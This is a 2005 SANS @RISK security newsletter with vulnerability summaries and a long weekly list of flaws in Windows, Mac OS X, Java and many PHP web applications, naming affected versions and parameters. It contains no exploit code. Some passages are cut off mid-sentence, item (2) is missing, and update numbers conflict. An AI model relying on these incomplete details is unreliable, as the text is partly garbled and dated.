Last day to save $500 for SANS San Diego 2013

@RISK: The Consensus Security Vulnerability Alert

Volume: IV, Issue: 48
December 2, 2005

SANS Newsletters Home

This was one of the biggest week's of all of 2005 in terms of the number of new vulnerabilities discovered - over 130.

Two critical vulnerabilities in Mac OS-X were patched by Apple as part of this week's Security Update. Also in the description of the Apple update, we've included a comment from a Mac user about Mac OS X being considered one of the SANS Top 20.

Alan

@RISK is the SANS community's consensus bulletin summarizing the most important vulnerabilities and exploits identified during the past week and providing guidance on appropriate actions to protect your systems (PART I). It also includes a comprehensive list of all new vulnerabilities discovered in the past week (PART II).

Summary of the vulnerabilities reported this week:

    • Category
    • # of Updates & Vulnerabilities
    • Windows
    • 1 (#4, #5)
    • Third Party Windows Apps
    • 4
    • Mac OS
    • 1 (#1)
    • Linux
    • 4
    • Unix
    • 2
    • Novell
    • 1
    • Cross Platform
    • 22 (#2, #3)
    • Web Application
    • 95
    • Network Device
    • 3
    • Hardware
    • 1

**************************** Sponsored Links: ***************************

1) 14-Day Free Trial of QualysGuard - the most accurate On Demand Vulnerability Management Solution. http://www.sans.org/info.php?id=947

2) SANS Webcast: Learn how Banco Santander stays ahead of the threat with IPS solutions from Internet Security Systems. http://www.sans.org/info.php?id=948

3) New eBook: "The Definitive Guide to Information Theft Prevention". Security author Dan Sullivan discusses tactics & technologies to prevent information theft. http://www.sans.org/info.php?id=949

**************************************************************************

Table Of Contents
Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys (www.qualys.com)
Windows
Third Party Windows Apps
Mac Os
Linux
Unix
Novell
Cross Platform
Web Application
Network Device
Hardware
PART I Critical Vulnerabilities

Part I is compiled by Rohit Dhamankar at TippingPoint, a division of 3Com, as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at http://www.sans.org/newsletters/cva/#process

Widely Deployed Software
  • (1) HIGH: Apple Security Update 2005-009
  • Affected:
    • Mac OS X versions 10.3.9 and 10.4.3

  • Description: Apple released a security update for Mac OS X that addresses a number of vulnerabilities. The important issues that are fixed by this update are a buffer overflow in CoreFoundation that can be triggered by a specially crafted URL, and remote code execution flaws in Safari browser. The technical details required to exploit the flaws have not been posted publicly yet.

  • Status: Apply the update released by Apple on November 29, 2005.

  • Council Site Actions: A few of the council sites are running the affected software. One site is deploying the update now; several other sites will deploy after they complete the QA process. Note to readers (from Alan). You may have noticed the inclusion of Mac OS X in the SANS Top 20 and the resulting outcries. We thought you might enjoy the following note from someone who apparently believes that Mac security should never be questioned. I've changed some words to

  • (3) MODERATE: Sun Java JRE Sandbox Security Bypass
  • Affected:
    • JDK and JRE version 5.0 Update 3 and prior for Windows, Solaris and Linux
    • SDK and JRE 1.3.1_15 and prior
    • SDK and JRE 1.4.2_08 and prior

  • Description: The Sun Java Runtime Environment (JRE) enables applets on websites to run on a client's browser. The Java Security Manager controls the resources a downloaded applet can access ("sandbox" model). Multiple vulnerabilities in the Sun JRE can be exploited by a malicious applet to break out of this "sandbox", and access any local resources. As a result, if a user browses a webpage containing the malicious applet, the applet may be able to execute arbitrary commands on the client system with the privileges of the logged-on user. Note that applets are automatically downloaded and executed in typical browser configurations. The technical details about the flaws have not been publicly posted yet.

  • Status: Sun confirmed. Upgrade to SDK and JRE 1.3.1_16 , SDK and JRE 1.4.2_09 or JDK and JRE 5.0 Update 4. You can download the software from http://www.java.com/en/download/manual.jsp

  • Council Site Actions: All of the council sites are responding to this item. They all plan to distribute the patch during their next regularly scheduled system update process. One site commented that they will also "lock down" desktops that are running applications requiring older, broken versions of Java.

  • References:
Exploit Code
Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 48, 2005

This list is compiled by Qualys ( www.qualys.com ) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 4701 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.

  • 05.48.1 - CVE: Not Available
  • Platform: Windows
  • Title: Windows SynAttackProtect Predictable Hash Remote Denial of Service
  • Description: Microsoft Windows allows administrators to defend against TCP/IP SYN attacks by adding the "SynAttackProtect" value to the "HKLMSYSTEMCurrentControlSetServicesTcpipParameters" registry key. The vulnerability arises due to a design error in the function responsible for the hash table management. Reports indicate that the affected function used by the TCP/IP stack creates a predictable hash as only a few fields of the incoming SYN packet are employed in the hash creation. For a list of vulnerable versions please visit the reference link provided.
  • Ref: http://www.securityfocus.com/bid/15613
  • 05.48.2 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: SpeedProject Multiple Products File Extraction Remote Buffer Overflow Vulnerabilities
  • Description: SpeedProject offers various compression utilities such as SpeedCommander, ZipStar, and Squeez for Microsoft Windows platforms. Multiple products by SpeedProject are affected by remote buffer overflow vulnerabilities. These issues arise because the applications fail to perform boundary checks prior to copying user-supplied data into sensitive process buffers. For a list of vulnerable software and versions please visit the reference link provided.
  • Ref: http://www.securityfocus.com/bid/15554
  • 05.48.3 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: MailEnable IMAP Rename Request Remote Denial of Service
  • Description: MailEnable is a commercially available mail server. It is prone to a remote denial of service issue because the application fails to handle exceptional conditions in a proper manner. Remote attackers can exploit this issue to trigger a denial of service condition. MailEnable Professional 1.7 and MailEnable Enterprise 1.1 are reportedly affected.
  • Ref: http://www.securityfocus.com/bid/15556/info
  • 05.48.4 - CVE: CVE-2005-3812
  • Platform: Third Party Windows Apps
  • Title: freeFTPd Multiple Denial of Service Vulnerabilities
  • Description: freeFTPd is a ftp/sftp server. It is vulnerable to multiple remote denial of service issues due to insufficient handling of user-supplied input to "PORT" or "PASV" commands. freeFTPd version 1.0.10 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/15557
  • 05.48.5 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: pcAnywhere Authentication Denial of Service
  • Description: Symantec pcAnywhere is a remote host control application. It is vulnerable to a denial of service due to a buffer overflow prior to authentication. Symantec pcAnywhere versions 11.5.1 and earlier are vulnerable.
  • Ref: http://www.symantec.com/avcenter/security/Content/2005.11.29.html
  • 05.48.6 - CVE: CVE-2005-2088, CVE-2005-2700, CVE-2005-2757,CVE-2005-3185, CVE-2005-3700, CVE-2005-2969, CVE-2005-3701,CVE-2005-2491, CVE-2005-3702, CVE-2005-3703, CVE-2005-3705,CVE-2005-1993, CVE-2005-3704
  • Platform: Mac Os
  • Title: Apple Mac OS X Security Update 2005-009 Multiple Vulnerabilities
  • Description: Apple has released Security Update 2005-008 to address multiple Mac OS X local and remote vulnerabilities. Please see the advisory for details. Apple Mac OS X Server versions 10.4.3 and earlier are affected.
  • Ref: http://www.securityfocus.com/advisories/9778
  • 05.48.8 - CVE: Not Available
  • Platform: Linux
  • Title: IPsec-Tools IKE Message Handling Denial of Service
  • Description: IPsec-Tools is a port of KAME's IPsec utilities to the Linux-2.6 IPsec implementation. It is prone to a denial of service vulnerability. The problem presents itself when dealing with malformed IKE traffic. When in the "AGGRESSIVE" mode, the application fails to check for the existence of certain payloads. IPsec-Tools versions 0.6.2 and earlier are vulnerable.
  • Ref: http://www.niscc.gov.uk/niscc/docs/re-20051114-01014.pdf?lang=en
  • 05.48.9 - CVE: CVE-2005-3272
  • Platform: Linux
  • Title: Linux Kernel Network Bridge Incorrectly Forwarded Packets Information Disclosure
  • Description: The Linux Kernel is susceptible to an information disclosure vulnerability in its network bridging functionality. When packet filtering on a bridge, packets that are dropped by the packet filter result in an inappropriate bridge forwarding database. Malicious users that send spoofed packets to an affected firewall can cause the forwarding database to be updated in such a fashion that packets that should not normally traverse the bridge are leaked back to the attacker. Kernel versions 2.6.11.11 and prior are vulnerable to this issue.
  • Ref: http://www.securityfocus.com/bid/15536
  • 05.48.10 - CVE: Not Available
  • Platform: Linux
  • Title: Kadu Remote Denial of Service
  • Description: Kadu is an instant messaging application. It is vulnerable to a denial of service due to insufficient handling of crafted messages with "rich_text" and image basic information from a Gadu-Gadu server. Kadu versions 0.4.2 and 0.5.0pre are vulnerable.
  • Ref: http://www.securityfocus.com/bid/15620
  • 05.48.11 - CVE: Not Available
  • Platform: Unix
  • Title: Opera Web Browser Arbitrary Command Execution
  • Description: Opera Web Browser is affected by an arbitrary command execution vulnerability. This issue arises due to insufficient sanitization of user-supplied data. A remote attacker could exploit this to gain unauthorized access. Opera 8.50 and prior versions running on Unix and Linux platforms are vulnerable to this issue.
  • Ref: http://www.securityfocus.com/bid/15521/info
  • 05.48.12 - CVE: CVE-2005-3833, CVE-2005-3834
  • Platform: Unix
  • Title: Tunez Multiple Input Validation Vulnerabilities
  • Description: Tunez is a freely available, open source web MP3 jukebox. Tunez is prone to multiple input validation vulnerabilities. Tunez version 1.21 is vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/tunez-sql-and-xss-vuln.html
  • 05.48.13 - CVE: Not Available
  • Platform: Novell
  • Title: Novell ZENworks Remote Diagnostics Console One Unauthorized Access
  • Description: Novell ZENworks Remote Diagnostics is prone to an unauthorized access issue. Specific details about this vulnerability are currently unavailable. Please check the advisory link mentioned below. Novell ZENworks for Servers version 3.0.2 IR4 has been released to fix this issue.
  • Ref: http://www.securityfocus.com/bid/15540
  • 05.48.14 - CVE: Not Available
  • Platform: Cross Platform
  • Title: IPUpdate Remote Buffer Overflow
  • Description: IPUpdate is used to update domains with an IP address taken from pluggable external tools. It is prone to a buffer overflow vulnerability because the application fails to perform boundary checks prior to copying user-supplied data into finite sized process buffers. A remote attacker could exploit this issue to execute arbitrary code. IPUpdate versions prior to 1.1.0 are affected by this issue.
  • Ref: http://www.securityfocus.com/bid/15534/info
  • 05.48.16 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Inkscape SVG Image Buffer Overflow
  • Description: Inkscape is an Open Source drawing tool that uses the W3C standard SVG format. It is prone to a buffer overflow vulnerability due to a failure in the application to do proper bounds checking on user-supplied data before copying it into a finite sized buffer. Inkscape versions 0.42 and 0.41 are affected.
  • Ref: http://www.securityfocus.com/bid/15507/exploit
  • 05.48.17 - CVE: CVE-2005-3745
  • Platform: Cross Platform
  • Title: Apache Struts Error Response Cross-Site Scripting
  • Description: Struts is an open source framework for building Web applications. It is prone to a cross-site scripting vulnerability due to insufficient sanitization of user-supplied input. Apache Struts version 1.2.7 is vulnerable.
  • Ref: http://www.hacktics.com/AdvStrutsNov05.html
  • 05.48.18 - CVE: CVE-2005-3632
  • Platform: Cross Platform
  • Title: NetPBM pnmtopng Long Text Line Buffer Overflow
  • Description: NetPBM is a collection of utilities for the manipulation of graphic images. One of the utilities is pnmtopng, which converts PNM images to PNG images. pnmtopng is susceptible to buffer overflow issues due to a failure of the application to properly bounds check user-supplied data prior to copying it to an insufficiently sized memory buffer. NetPBM versions 9.20 and 10.0 are affected.
  • Ref: http://www.securityfocus.com/bid/15514
  • 05.48.19 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Jetty URL Encoded Backslash Source Code Disclosure
  • Description: Jetty is an Open Source web server and servlet container. Jetty is prone to a source code disclosure vulnerability due to a failure in the web server application to properly handle Web requests. An attacker can exploit this vulnerability to retrieve sensitive information from ".jsp" files by appending a URI encoded backslash "%5C" character at the end of file names. Jetty versions 5.1.5 and earlier are reported to be vulnerable.
  • Ref: http://www.securityfocus.com/bid/15515/discuss
  • 05.48.20 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Gadu-Gadu Multiple Remote Vulnerabilities
  • Description: Gadu-Gadu is an instant messenger. It is prone to multiple remote vulnerabilities. Gadu-Gadu versions 7.2 and earlier are vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/417328
  • 05.48.21 - CVE: Not Available
  • Platform: Cross Platform
  • Title: WebSphere Application Server Denial of Service
  • Description: IBM WebSphere Application Server for z/OS is prone to a double free vulnerability that may allow attackers to trigger a denial of service condition. This issue results from a design error affecting the "BBOORB" module. WebSphere Application Server for z/OS version 5.0 is affected.
  • Ref: http://www.securityfocus.com/bid/15514
  • 05.48.22 - CVE: Not Available
  • Platform: Cross Platform
  • Title: PHP MB_Send_Mail TO Argument Header Injection
  • Description: The PHP "mb_send_mail()" function is used to send encoded email messages. PHP is susceptible to a header injection vulnerability when sending email. This issue is due to insufficient sanitization of user-supplied input to the "mb_send_mail()" function. This may allow attackers to utilize vulnerable Web applications as an anonymous email proxy. For a list of vulnerable versions please visit the reference link provided.
  • Ref: http://www.securityfocus.com/bid/15571
  • 05.48.23 - CVE: Not Available
  • Platform: Cross Platform
  • Title: unalz Archive Filename Buffer Overflow
  • Description: unalz is an archiving program. It is vulnerable to a buffer overflow issue that is exposed when the application extracts an ALZ archive that contains a file with a long name. An attacker could exploit this issue to execute arbitrary code in the context of the user who extracts a malicious archive. unalz versions earlier than 0.53 are vulnerable.
  • Ref: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=340842
  • 05.48.24 - CVE: CVE-2005-3875
  • Platform: Cross Platform
  • Title: Enterprise Connector SQL Injection
  • Description: Enterprise Connector is a Web-based conference and messaging application. It is vulnerable to an SQL injection issue due to insufficient sanitization of user-supplied input to the "messageid" parameter in the "send.php" and "messages.php" scripts. Enterprise Heart Enterprise Connector version 1.0.2 is vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/enterprise-connector-sql-inj-vuln.html
  • 05.48.25 - CVE: Not Available
  • Platform: Cross Platform
  • Title: ktools Remote Buffer Overflow
  • Description: ktools is a library that provides various text-mode user interface controls. It is prone to a remote buffer overflow vulnerability when used with centericq and a string containing 1024 or more characters is supplied as a part of a contact's details. This may be exploited through the "description" field of an RSS feed. ktools versions 0.3 and earlier are vulnerable to this issue.
  • Ref: http://www.securityfocus.com/bid/15600
  • 05.48.26 - CVE: CVE-2005-3870
  • Platform: Cross Platform
  • Title: EdmoBBS SQL Injection
  • Description: EdmoBBS is a Web-based bulletin board application. It is vulnerable to an SQL injection issue due to insufficient sanitization of user-supplied input to the "table" and "id" parameters of the "edmobbs9r.php" script. EdmoBBS version 0.9 is vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/edmobbs-sql-inj-vuln.html
  • 05.48.27 - CVE: CVE-2005-3874
  • Platform: Cross Platform
  • Title: Netzbrett P_Entry Parameter SQL Injection
  • Description: Netzbrett is a Web-based bulletin board system. It is vulnerable to an SQL Injection issue due to insufficient santization of user-supplied input to the "p_entry" parameter of the "p_entry" script. Netzbrett version 1.5.1 is vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/netzbrett-151-sql-inj-vuln.html
  • 05.48.28 - CVE: Not Available
  • Platform: Cross Platform
  • Title: GuppY Remote File Include and Command Execution
  • Description: GuppY is Web portal software implemented in PHP. It is vulnerable to multiple remote file include and command execution issues due to insufficient sanitization of user-supplied input to the "REMOTE_ADDR" variable of the "error.php" script. GuppY versions 4.5.9 and earlier are vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/417899
  • 05.48.29 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Panda Software Antivirus Library ZOO Archive Heap Overflow
  • Description: Panda Software Antivirus products are vulnerable to a heap overflow issue exposed when the antivirus library attempts to decompress ZOO archive files. Successful exploitation will result in execution of arbitrary code in the context of an affected application.
  • Ref: http://www.securityfocus.com/bid/15616
  • 05.48.30 - CVE: Not Available
  • Platform: Cross Platform
  • Title: NuFW Malformed Packet Remote Denial of Service
  • Description: NuFW is an authenticating network application proxy firewall. It is vulnerable to a remote denial of service issue due to a failure of the application to properly handle malformed network packets from authenticated users. NuFW versions prior to 1.0.16 are affected.
  • Ref: http://www.nufw.org/+NUFW-1-16-minor-security-fix+.html
  • 05.48.31 - CVE: Not Available
  • Platform: Cross Platform
  • Title: KBase Express Multiple SQL Injection Vulnerabilities
  • Description: KBase Express is a knowledge base management application. It is vulnerable to multiple SQL injection issues due to insufficient sanitization of user-supplied input to the "id" parameter of the "category.php" script and other unspecified parameters. KBase Express versions 1.0.0 and earlier are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/kbase-express-sql-inj-vuln.html
  • 05.48.32 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Opera Web Browser JNI Routine Handling Remote Denial of Service
  • Description: Opera Web Browser is prone to a remote denial of service vulnerability. The issue presents itself when the browser handles a Java applet containing a Java Native Interface (JNI) routine implementing the com.opera.JSObject class. Opera version 8.50 is reportedly vulnerable.
  • Ref: http://www.securityfocus.com/bid/15648
  • 05.48.33 - CVE: CVE-2005-3694
  • Platform: Cross Platform
  • Title: Centericq Malformed Packet Handling Remote Denial of Service
  • Description: Centericq is a text mode menu and window driven IM interface that supports the ICQ2000, Yahoo!, AIM, IRC, MSN, Gadu-Gadu and Jabber protocols. It is prone to a remote denial of service vulnerability when handling an empty packet on the listening port for ICQ messages.
  • Ref: http://www.securityfocus.com/bid/15649
  • 05.48.34 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Perl Unspecified Format String Vulnerability
  • Description: Perl is vulnerable to a format string issue due to a failure of the programming language to properly handle format specifiers. An attacker may leverage this issue to gain unauthorized remote access.
  • Ref: http://lists.immunitysec.com/pipermail/dailydave/2005-November/002694.html
  • 05.48.35 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Sun Java Runtime Environment Multiple Privilege Escalation Vulnerabilities
  • Description: Sun JRE is susceptible to various privilege escalation vulnerabilities. These issues can allow remote Java applications to read/write local files and execute arbitrary applications in the context of an affected user. Please refer to the advisory below for details.
  • Ref: http://www.securityfocus.com/bid/15615
  • 05.48.36 - CVE: CVE-2005-3773, CVE-2005-3772, CVE-2005-3771
  • Platform: Web Application
  • Title: Joomla Multiple Input Validation Vulnerabilities
  • Description: Joomla is web content management software implemented in PHP. It is prone to multiple input validation vulnerabilities. Joomla versions 1.0 through 1.0.3 are vulnerable.
  • Ref: http://www.joomla.org/content/view/499/66/
  • 05.48.37 - CVE: Not Available
  • Platform: Web Application
  • Title: PHPPost Subject HTML Injection
  • Description: PHPPost is a message board application written in PHP. It is prone to an HTML injection vulnerability due to improper sanitization of user-supplied input to the subject field of message posts.
  • Ref: http://www.securityfocus.com/archive/1/417434
  • 05.48.38 - CVE: Not Available
  • Platform: Web Application
  • Title: Torrential Getdox.PHP Directory Traversal
  • Description: Torrential is a BitTorrent tracker application. Insufficient sanitization of the "../" directory traversal sequence exposes the application to a directory traversal issue. Torrential version 1.2 is affected.
  • Ref: http://www.securityfocus.com/bid/15530
  • 05.48.39 - CVE: CVE-2005-3735
  • Platform: Web Application
  • Title: e-Quick Cart Multiple SQL Injection Vulnerabilities
  • Description: Coastal Data Management e-Quick Cart is an e-commerce application. It is vulnerable to multiple SQL injection issues due to insufficient sanitization of user-supplied input to the productid parameter in shopaddtocart.asp, strpemail parameter in shopprojectlogin.asp and id parameter in shoptellafriend.asp. All versions of Coastal Data Management e-Quick Cart are vulnerable.
  • Ref: http://www.frsirt.com/english/advisories/2005/2506
  • 05.48.40 - CVE: Not Available
  • Platform: Web Application
  • Title: APBoard Thread.PHP SQL Injection
  • Description: APBoard is a message board application written in PHP. It is prone to an SQL injection vulnerability due to insufficient sanitization of user-supplied input to the "start" parameter of the "thread.php" script.
  • Ref: http://www.securityfocus.com/bid/15513
  • 05.48.41 - CVE: Not Available
  • Platform: Web Application
  • Title: PHP Download Manager Files.PHP SQL Injection
  • Description: PHP Download Manager is a file download manager. It is prone to an SQL injection issue due to a failure in the application to properly sanitize user-supplied input to the "cat" parameter of the "files.php" script before using it in an SQL query. A remote attacker could exploit this issue to compromise the application.
  • Ref: http://www.securityfocus.com/bid/15517/info
  • 05.48.42 - CVE: Not Available
  • Platform: Web Application
  • Title: Saturn Innovation Mailing System SQL Injection
  • Description: Saturn Innovation Mailing system is in part used to send user forgotten passwords through email. It is vulnerable to an SQL injection issue due to a failure in the application to properly sanitize user-supplied input. An attacker could exploit this issue to compromise the application. All current versions of Saturn Inoovation Mailing system are vulnerable.
  • Ref: http://www.securityfocus.com/bid/15518/info
  • 05.48.43 - CVE: CVE-2005-3748
  • Platform: Web Application
  • Title: Nuke ET Search Module SQL Injection
  • Description: Nuke ET is a Web portal application. It is vulnerable to an SQL injection issue due to insufficient sanitization of user-supplied input to the "query" parameter of the "search" module. Tru-Zone Nuke ET versions 3.2 and ealier are vulnerable.
  • Ref: http://lostmon.blogspot.com/2005/11/nuke-et-search-module-query-variable.html
  • 05.48.44 - CVE: Not Available
  • Platform: Web Application
  • Title: PHPPost Multiple Cross-Site Scripting Vulnerabilities
  • Description: PHPPost is a free message board. It is vulnerable to multiple cross-site scripting issues due to a failure in the application to properly sanitize user-supplied input to the "user" parameter of the "profile.php" and "mail.php" scripts. These may facilitate the theft of cookie-based authentication credentials as well as other attacks. PHPPost version 1.0 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/15524/info
  • 05.48.45 - CVE: Not Available
  • Platform: Web Application
  • Title: OTRS Multiple Input Validation Vulnerabilities
  • Description: OTRS is the Open-source Ticket Request System written in Perl. It is prone to multiple input validation vulnerabilities due to insufficient sanitization of user-supplied input. These issues affect the "User" parameter of the "Login" function and the "TicketID" and "ArticleID" parameters of the "AgentTicketPlain" function. OTRS versions 2.0.3 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/15537/exploit
  • 05.48.46 - CVE: Not Available
  • Platform: Web Application
  • Title: Virtual Hosting Control System Error Message Cross-Site Scripting
  • Description: Virtual Hosting Control System is a web-based control panel for Web server management. It is prone to cross-site scripting attacks. The vulnerability affects the "vhcs/gui/errordocs/index.php" script when error messages are rendered. Versions 2.2 and 2.4.6 of the software are vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/417433
  • 05.48.47 - CVE: Not Available
  • Platform: Web Application
  • Title: PmWiki Search Cross-Site Scripting
  • Description: PmWiki is a web-based wiki application written in PHP. It is prone to a cross-site scripting vulnerability due to insufficient sanitization of user-supplied input to the "q" parameter of the "Search" function. PmWiki versions 2.0 up to and including 2.0.12 are vulnerable.
  • Ref: http://www.securityfocus.com/bid/15539
  • 05.48.48 - CVE: Not Available
  • Platform: Web Application
  • Title: Torrential Getdox.PHP Cross-Site Scripting
  • Description: Torrential is a tracking application for BitTorrent. It is prone to a cross-site scripting issue due to a failure in the application to properly sanitize user-supplied input to the "getdox.php" script. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. Torrential version 1.2 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/15543/info
  • 05.48.49 - CVE: Not Available
  • Platform: Web Application
  • Title: NetObjects Fusion 9 Information Disclosure
  • Description: NetObjects Fusion 9 is an application that is used to create and manage Websites. It is vulnerable to an information disclosure issue which may allow remote attackers to disclose authentication credentials and all content, resulting in a complete compromise. This issue affects any site using NetObjects Fusion 9 and nPower.
  • Ref: http://www.schneier.com/blog/archives/2005/11/possible_net_ob.html
  • 05.48.50 - CVE: Not Available
  • Platform: Web Application
  • Title: AFFCommerce Multiple SQL Injection Vulnerabilities
  • Description: AFFCommerce Shopping Cart is a shopping cart application. It is vulnerable to multiple SQL injection issues due to insufficient sanitization of user-supplied input to the "cl" parameter of the "SubCategory.php" script and the "item_id" parameter of the "ItemInfo.php" and "ItemReview.php" scripts. AFFCommerce Shopping Cart versions 1.1.4 and earlier are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/affcommerce-multiple-sql-inj.html
  • 05.48.51 - CVE: Not Available
  • Platform: Web Application
  • Title: Easybe 1-2-3 Music Store Process.PHP SQL Injection
  • Description: Easybe 1-2-3 Music Store is a web application designed to help an individual to sell music online. 1-2-3 Music Store is prone to an SQL injection vulnerability due to improper sanitization of user-supplied input to the "AlbumID" parameter of the "process.php" script before using it in an SQL query. Easybe 1-2-3 Music Store version 1.0 is reported to be vulnerable.
  • Ref: http://www.securityfocus.com/bid/15544/exploit
  • 05.48.52 - CVE: Not Available
  • Platform: Web Application
  • Title: kPlaylist Search Cross-Site Scripting
  • Description: kPlaylist is a web application for displaying and serving music files. It is prone to a cross-site scripting vulnerability due to insufficient sanitization of user-supplied input to the "searchfor" parameter of the search function. kPlaylist version 1.6 Build 411 and Build 400 are vulnerable.
  • Ref: http://www.securityfocus.com/bid/15546
  • 05.48.53 - CVE: Not Available
  • Platform: Web Application
  • Title: WSN Forum Memberlist.PHP SQL Injection
  • Description: WSN Forum is a web-based forum application. Insufficient sanitization of the "id" parameter in the "memberlist.php" script exposes the application to an SQL injection issue. WSN Forum version 1.21 is affetced.
  • Ref: http://www.securityfocus.com/bid/15549
  • 05.48.54 - CVE: Not Available
  • Platform: Web Application
  • Title: OmnistarLive Multiple SQL Injection
  • Description: OmnistarLive is a suite of tools for managing an online business. It is prone to multiple SQL injection issues due to a failure in the application to properly sanitize user-supplied input to the "id" and "category_id" parameters of the "kb.php" script. OmnistarLive versions 5.2 and earlier are vunerable.
  • Ref: http://pridels.blogspot.com/2005/11/omnistar-live-id-and-categoryid-sql.html
  • 05.48.55 - CVE: Not Available
  • Platform: Web Application
  • Title: CommodityRentals SQL Injection
  • Description: CommodityRentals is a Web based e-commerce application. It is prone to an SQL injection vulnerability due to insufficient sanitization of user-supplied input to the "user_id" parameter of the "usersession.php" script before using it in an SQL query. CommodityRentals version 2.0 is affected.
  • Ref: http://www.securityfocus.com/bid/15552/exploit
  • 05.48.56 - CVE: Not Available
  • Platform: Web Application
  • Title: PHP Labs Survey Wizard SQL Injection
  • Description: PHP Labs Survey Wizard is a Web survey application. It is vulnerable to an SQL injection issue due to insufficient sanitization of user-supplied input to the "sid" parameter of the "survey.php" script. All versions of PHP Labs Survey Wizard are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/survey-wizard-sid-sql-injection-vuln.html
  • 05.48.57 - CVE: Not Available
  • Platform: Web Application
  • Title: Ezyhelpdesk Multiple SQL Injection Vulnerabilities
  • Description: Ezyhelpdesk is a web-based helpdesk application. It is prone to multiple SQL injection vulnerabilities due to improper sanitization of user-supplied input to the "search_string" parameter in the ticket search form, and the "faq_id", "edit_id" and "c_id" parameters of the "/help/index.php" script. Ezyhelpdesk version 1.0 is affected.
  • Ref: http://www.securityfocus.com/bid/15553/exploit
  • 05.48.58 - CVE: CVE-2005-2253
  • Platform: Web Application
  • Title: PHP Labs Top Auction Multiple SQL Injection Vulnerabilities
  • Description: PHP Labs Top Auction is a web-based auction site written in PHP. PHP Labs Top Auction is prone to multiple SQL injection vulnerabilities due to insufficient sanitization of user-supplied input to various scripts.
  • Ref: http://pridels.blogspot.com/2005/11/top-auction-multiple-sql-vuln.html
  • 05.48.59 - CVE: Not Available
  • Platform: Web Application
  • Title: blogBuddies Multiple Cross-Site Scripting Vulnerabilities
  • Description: blogBuddies is an RSS and Atom feed gathering application. Insufficient sanitization of user supplied input exposes the application to multiple cross-site scripting issues. blogBuddies version 0.3 is affected.
  • Ref: http://www.securityfocus.com/bid/15549
  • 05.48.60 - CVE: Not Available
  • Platform: Web Application
  • Title: FreeForum Multiple SQL Injection Vulnerabilities
  • Description: FreeForum is a web-based bulletin board. It is prone to multiple SQL injection vulnerabilities due insufficient sanitization of user-supplied input before using it in SQL queries. Specifically, these issues affect the "cat" and "thread" parameters of the "forum.php" script. FreeForum versions 1.1 and prior versions are reportedly affected.
  • Ref: http://www.securityfocus.com/bid/15559/exploit
  • 05.48.61 - CVE: Not Available
  • Platform: Web Application
  • Title: SCSSBoard Search Module Cross-Site Scripting Vulnerabilties
  • Description: SCssBoard is a web forum application. It is prone to a cross-site scripting vulnerability due to improper sanitization of user-supplied input to the "search_term" parameter of the "Search" page. SCssBoard versions 1.12 and earlier are reported to be vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/scssboard-xss-vuln-in-search-param.html
  • 05.48.62 - CVE: Not Available
  • Platform: Web Application
  • Title: Softbiz Web Host Directory Script Multiple SQL Injection Vulnerabilities
  • Description: Softbiz Web Host Directory Script is an advanced PHP script to run your own web host comparison site. It is prone to multiple SQL injection vulnerabilities due to insufficient sanitization of user-supplied input to various scripts. SoftBiz Web Hosting Directory Script versions 1.1 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/15561
  • 05.48.63 - CVE: Not Available
  • Platform: Web Application
  • Title: Comdev Vote Caster Index.PHP SQL Injection
  • Description: Comdev Vote Caster is a web-based voting application. Insufficient sanitization of the "campaign_id" parameter in the "index.php" script exposes the application to a SQL injection issue. Comdev Vote Caster version 3.1 is affected.
  • Ref: http://www.securityfocus.com/bid/15563
  • 05.48.64 - CVE: Not Available
  • Platform: Web Application
  • Title: SupportPro SupportDesk Multiple Cross-Site Scripting Vulnerabilities
  • Description: SupportPro SupportDesk is a web-based help desk. It is prone to multiple cross-site scripting vulnerabilities due to a failure in the application to properly sanitize user-supplied input to the "post" and "view" tickets parameters. An attacker may leverage this issue to steal cookie based authentication and perform other attacks. All current versions are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/supportpro-supportdesk-xss-vuln.html
  • 05.48.65 - CVE: Not Available
  • Platform: Web Application
  • Title: Orca Forum Forum.PHP SQL Injection
  • Description: Orca Forum is web-based forum software. It is prone to an SQL injection vulnerability due to improper sanitization of user-supplied input to the "msg" parameter of the "forum.php" script before using it in an SQL query. Orca Forum version 4.3 is affected.
  • Ref: http://pridels.blogspot.com/2005/11/orca-forum-43x-msg-sql-inj.html
  • 05.48.66 - CVE: Not Available
  • Platform: Web Application
  • Title: OvBB Multiple SQL Injection Vulnerabilities
  • Description: OvBB is a web-based bulletin board application. It is vulnerable to multiple SQL injection issues due to insufficient sanitization of user-supplied input to the "userid" parameter of the "profile.php" script and the "threadid" parameter of the "thread.php" script. OvBB versions 0.08a and earlier are vulnerable.
